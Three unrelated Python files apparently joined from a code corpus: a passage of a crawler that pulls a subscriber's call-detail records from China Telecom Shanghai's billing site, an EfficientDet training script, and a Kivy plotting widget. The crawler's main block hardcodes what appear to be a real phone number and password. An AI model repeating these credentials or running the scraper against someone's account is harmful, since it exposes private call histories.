dates_retrys.append((each_month, retrys))
else:
self.log('crawler', message, resp)
crawl_num += 1
missing_list.append(search_month)
continue
if self.flag:
self.log('crawler', u'详单字段不对应问题', resp)
self.flag = False
call_log.extend(month_log)
else:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
else:
self.log('crawler', 'html_error', resp)
missing_list.append(search_month)
crawl_num += 1
continue
self.log("crawler", "重试列表{}".format(log_for_retrys), "")
missing_list.sort(reverse=True)
if crawl_num > 0:
return 9, 'crawl_error', call_log, missing_list, pos_missing
if len(pos_missing) == 6 or len(missing_list) == 6:
return 9, 'website_busy_error', call_log, missing_list, pos_missing
return 0, "success", call_log, missing_list, pos_missing
def get_search_list(self, length=6, strf='%Y%m'):
current_time = datetime.datetime.now()
search_list = []
for month_offset in range(0, length):
search_list.append((current_time - relativedelta(months=month_offset)).strftime(strf))
return search_list
def new_crawl_call_log(self):
possibly_missing_list = []
# 部分缺失月份
self.crawl_error = 0
# 爬虫队列
self.work_queue = Queue()
self.work_queue_info = Queue()
# 重试队列
self.crawl_again_queue = Queue()
self.crawl_again_info_queue = Queue()
# 详单数据
self.data_queue = Queue()
self._runing = threading.Event()
self._runing.set()
self.last_month = Queue()
searchMonth = [x for x in range(0, -6, -1)]
[self.work_queue.put((x, 0)) for x in searchMonth]
control_work_queue = Thread(target=self.control_work_queue, args=(self.work_queue, 'main', 0.2))
control_work_queue.start()
control_again_queue = Thread(target=self.control_work_queue,
args=(self.crawl_again_queue, "crawl_again", random.uniform(2, 3.5)))
control_again_queue.start()
self.work_control()
control_work_queue.join()
control_again_queue.join()
again_queue_last = []
part_miss_set = set()
miss_set = set()
today = date.today()
while not self.last_month.empty():
work_one = self.last_month.get()
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
miss_set.add(search_month_str)
again_queue_last.append({search_month_str: work_one[1]})
while not self.crawl_again_queue.empty():
work_one = self.crawl_again_queue.get()
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
miss_set.add(search_month_str)
again_queue_last.append({search_month_str: work_one[1]})
again_list = []
while not self.crawl_again_info_queue.empty():
work_one = self.crawl_again_info_queue.get()
# search_month_str = work_one[0]
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
again_list.append({search_month_str: work_one[1]})
self.log("crawler", "重试队列: {}".format(again_list), "")
self.log("crawler", "重试剩余: {}".format(again_queue_last), "")
missing_month_list = [miss_x for miss_x in miss_set]
missing_month_list.sort(reverse=True)
part_missing_list = [x for x in part_miss_set]
part_missing_list.sort(reverse=True)
self.log("crawler", "缺失记录: {} 部分缺失: {}".format(missing_month_list, part_missing_list), "")
data_list = []
while not self.data_queue.empty():
data_list.append(self.data_queue.get())
if len(missing_month_list) == 6:
if self.crawl_error > 0:
return 9, "crawl_error", [], missing_month_list, possibly_missing_list, part_missing_list
else:
return 9, "website_busy_error", [], missing_month_list, possibly_missing_list, part_missing_list
return 0, "success", data_list, missing_month_list, possibly_missing_list, part_missing_list
def control_work_queue(self, work_queue, work_name="main", sleep_time=0):
while self._runing.is_set():
if not work_queue.empty():
get_page_data_params = work_queue.get()
self.get_page_data(*get_page_data_params)
if work_name != 'main':
self.crawl_again_info_queue.put(get_page_data_params)
if work_name != "main":
time.sleep(0)
# 将控制权移交出去
time.sleep(sleep_time)
def work_control(self):
must_stop_time = 40
time_limit = 30
empty_time_limit = 20
st_time = time.time()
break_time = st_time + time_limit
empty_break_time = st_time + empty_time_limit
must_break_time = st_time + must_stop_time
while True:
now_time = time.time()
time.sleep(0)
if self.work_queue.empty() and self.crawl_again_queue.empty() and now_time > empty_break_time:
self.log("crawler", "break 1 {} {}".format(st_time, now_time), "")
break
if now_time > break_time and self.work_queue.empty():
self.log("crawler", "break 2 {} {}".format(st_time, now_time), "")
break
if now_time > must_break_time:
self.log("crawler", "break 3 {} {}".format(st_time, now_time), "")
break
time.sleep(0)
self._runing.clear()
def get_page_data(self, each_month, retry_times):
retry_times_limit = 5
retry_times += 1
today = date.today()
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d" % (query_date.year, query_date.month)
begDate = "%d-%02d-01" % (query_date.year, query_date.month)
end_day = calendar.monthrange(query_date.year, query_date.month)[1]
endDate = "%d-%02d-%d" % (query_date.year, query_date.month, end_day)
crawl_call_data = {}
crawl_call_data['begin'] = 0
crawl_call_data['end'] = 9999
crawl_call_data['flag'] = 1
crawl_call_data['devNo'] = self.tel
crawl_call_data['dateType'] = 'now'
crawl_call_data['bill_type'] = 'SCP'
# 历史账单查询
# crawl_call_data['queryDate'] = monthDate
# 实时账单查询
crawl_call_data['startDate'] = begDate
crawl_call_data['endDate'] = endDate
crawl_call_data = urllib.urlencode(crawl_call_data)
call_log_url = "http://service.sh.189.cn/service/service/authority/query/billdetailQuery.do?" + crawl_call_data
code, key, resp = self.get(call_log_url)
if code == 0:
try:
call_log_res = json.loads(resp.text)
if call_log_res['CODE'] == "0":
key, code02, message, result = self.call_log_get(call_log_res, search_month)
if code02 == 0:
if result:
if self.flag:
self.log('crawler', u'详单字段不对应问题', resp)
self.flag = False
[self.data_queue.put(x) for x in result]
return
else:
self.log('crawler', u'详单为空', resp)
else:
self.log('crawler', u'未拿到数据', resp)
except:
error = traceback.format_exc()
self.log('crawler', u"详单解析出错 : %s" % error, resp)
self.crawl_error += 1
if retry_times <= retry_times_limit:
self.crawl_again_queue.put((each_month, retry_times))
else:
self.last_month.put((each_month, retry_times))
return
def call_log_get(self, response, search_month):
"""
| `update_time` | string | 更新时间戳 |
| `call_cost` | string | 爬取费用 |
| `call_time` | string | 通话起始时间 |
| `call_method` | string | 呼叫类型(主叫, 被叫) |
| `call_type` | string | 通话类型(本地, 长途) |
| `call_from` | string | 本机通话地 |
| `call_to` | string | 对方归属地 |
| `call_duration` | string | 通话时长 |
"""
records = []
try:
items = response['RESULT']['pagedResult']
call_total = len(items)
for i in range(1,call_total):
item = items[i]
data = {}
data['month'] = search_month
data['update_time'] = item['beginTime']
data['call_cost'] = item['totalFee']
# 以下几行为了转换时间戳
call_time = re.findall('\d{2}', item['beginTime'])
call_time_change = call_time[0] + call_time[1] + '-' + call_time[2] + '-' + call_time[3] + ' ' + \
call_time[4] + ':' + call_time[5] + ':' + call_time[6]
timeArray = time.strptime(call_time_change, "%Y-%m-%d %H:%M:%S")
call_time_timeStamp = str(int(time.mktime(timeArray)))
data['call_time'] = call_time_timeStamp
data['call_method'] = item['callType']
data['call_type'] = item['longDistanceType']
# data['call_from'] = item['callingPartyVisitedCity']
raw_call_from = item['callingPartyVisitedCity'].strip()
call_from, error = self.formatarea(raw_call_from)
if call_from:
data['call_from'] = call_from
else:
# self.log("crawler", "{} {}".format(error, raw_call_from), "")
data['call_from'] = raw_call_from
# data['call_to'] = item['calledPartyVisitedCity']
raw_call_to = item['calledPartyVisitedCity'].strip()
call_to, error = self.formatarea(raw_call_to)
if call_to:
data['call_to'] = call_to
else:
# self.log("crawler", "{} {}".format(error, raw_call_to), "")
if u'国内长途' in raw_call_to and not self.flag:
self.flag = True
data['call_to'] = raw_call_to
data['call_tel'] = item['targetParty']
data['call_duration'] = self.time_format(item['callDuriation'])
records.append(data)
except:
error = traceback.format_exc()
return 'html_error', 9, 'html_error %s' % error, records
return 'success', 0, 'success', records
def time_format(self,time_str):
xx = re.match(u'(.*时)?(.*分)?(.*秒)?', time_str)
h, m, s = 0, 0, 0
if xx.group(1):
hh = re.findall('\d+', xx.group(1))[0]
h = int(hh)
if xx.group(2):
mm = re.findall('\d+', xx.group(2))[0]
m = int(mm)
if xx.group(3):
ss = re.findall('\d+', xx.group(3))[0]
s = int(ss)
real_time = h * 60 * 60 + m * 60 + s
return str(real_time)
# def month_bill(self, **kwargs):
# today = date.today()
# data = {}
# data['billingCycleld'] = "%d%02d"%(today.year,today.month)
# data['queryFlag'] = 0
# data['productld'] = 2
# data['accNbr'] = kwargs['tel']
# data = urllib.urlencode(data)
# month_bill_url = "http://js.189.cn/chargeQuery/chargeQuery_queryCustBill.action?" + data
# try:
# month_bill_req = self.session.post(month_bill_url)
# except:
# error = traceback.format_exc()
# return "request_error", 9, error
# if month_bill_req.status_code == 200:
# return "success", 0, "get info", self.bill_log(month_bill_req.text)
# else:
# return "request_error", 9, "月单爬取失败:%d"%month_bill_req.status_code
#
# def bill_log(self, response):
# # 目前返回一个列表,元素为一个字典,键暂定费用及月份
# month_bill_res = json.loads(response)
# items = month_bill_res['statisticalList']
# bill_list = []
# for i in range(0,6):
# data = {}
# data['date'] = items[i]['itemName']
# data['bill'] = items[i]['itemCharge']
# bill_list.append(data)
# return bill_list
def crawl_phone_bill(self, **kwargs):
def get_missing_list():
missing_list = []
today = date.today()
search_month = [x for x in range(0, -6, -1)]
for each_month in search_month:
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d" % (query_date.year, query_date.month)
missing_list.append(search_month)
return missing_list
# url = 'http://service.sh.189.cn/service/query/bill'
# code, key, resp = self.get(url)
# if code != 0:
# missing_list = get_missing_list()
# return 0, 'success', [], missing_list
# if u'抱歉,预付费手机暂不支持账单查询,请选择其他设备查看账单' in resp.text:
self.log('website', 'website_busy_error', '')
missing_list = get_missing_list()
return 0, 'success', [], missing_list
if __name__ == '__main__':
c = Crawler()
USER_ID = "17321021422"
USER_PASSWORD = "368372"
c.self_test(tel=USER_ID, pin_pwd=USER_PASSWORD)
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=4,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 2, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', None, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int(FLAGS.eval_samples // FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
cheap_image.py
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mi
import matplotlib.tri as tri
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from kivy.clock import Clock
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
import copy
from array import array
import hashlib
# import threading
# import time
# Data dictionary: datadict has form {'u':u,'v':v,'V':V,'s1':s1d,'s2':s2d,'t':t,'err':err}
# Station dictionary: statdict has form {<station code>:{'on':<True/False>,'name':<name>,'loc':(x,y,z)}}
__cheap_image_debug__ = False
class InteractivePlotWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
def __init__(self, **kwargs):
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx
# print("On init:",self.nx,self.ny)
with self.canvas:
Color(1, 1, 1)
self.texture = Texture.create(size=(self.nx,self.ny))
self.buf = [0,0,0,255]*(self.nx*self.ny)
self.arr = array('B',self.buf)
self.update_mpl()
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture, index=0)
self.texture.wrap = 'clamp_to_edge'
# create a rectangle on which to plot texture (will be at index 0)
Color(1,1,1)
self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractivePlotWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def zoom_in(self) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def zoom_out(self) :
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_out:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def resize(self,widget,newsize) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.resize:",newsize)
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def set_zoom_factor(self,value) :
self.rect.size = self.check_size(self.nx*value,self.ny*value)
x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def check_boundaries(self,tex_coords) :
new_tex_coords = [0]*len(tex_coords)
max_x_shift = max((self.rect.size[0]-self.width)/self.rect.size[0],0)
new_tex_coords[0] = max(min(tex_coords[0],max_x_shift),0)
new_tex_coords[2] = max(min(tex_coords[2],1+max_x_shift),1)
new_tex_coords[4] = max(min(tex_coords[4],1+max_x_shift),1)
new_tex_coords[6] = max(min(tex_coords[6],max_x_shift),0)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
# print("Started update_mpl in thread")
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
# print("Made mpl plot in update_mpl in thread")
canvas.draw()
# print("Drew canvas in update_mpl in thread")
self.buf = np.asarray(canvas.buffer_rgba()).ravel()
# print("Assigned buf in update_mpl in thread")
self.arr = array('B', self.buf)
# print("Assigned arr in update_mpl in thread")
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
# print("Finished update_mpl in thread")
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
pass
class InteractiveImageReconstructionPlot(InteractivePlotWidget) :
def __init__(self,**kwargs) :
self.xarr = 0
self.yarr = 0
self.Iarr = 1
self.ddict = {}
self.sdict = {}
# self.argument_hash = None
super().__init__(**kwargs)
##########
# Low-level image reconstruction function
def reconstruct_image(self,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,f=2,method='cubic',make_hermitian=False) :
# print("Started image reconstruction in thread")
# Useful constant
uas2rad = np.pi/180.0/3600e6
# Exclude stations not in array
stations = list(np.unique(np.array(list(statdict.keys()))))
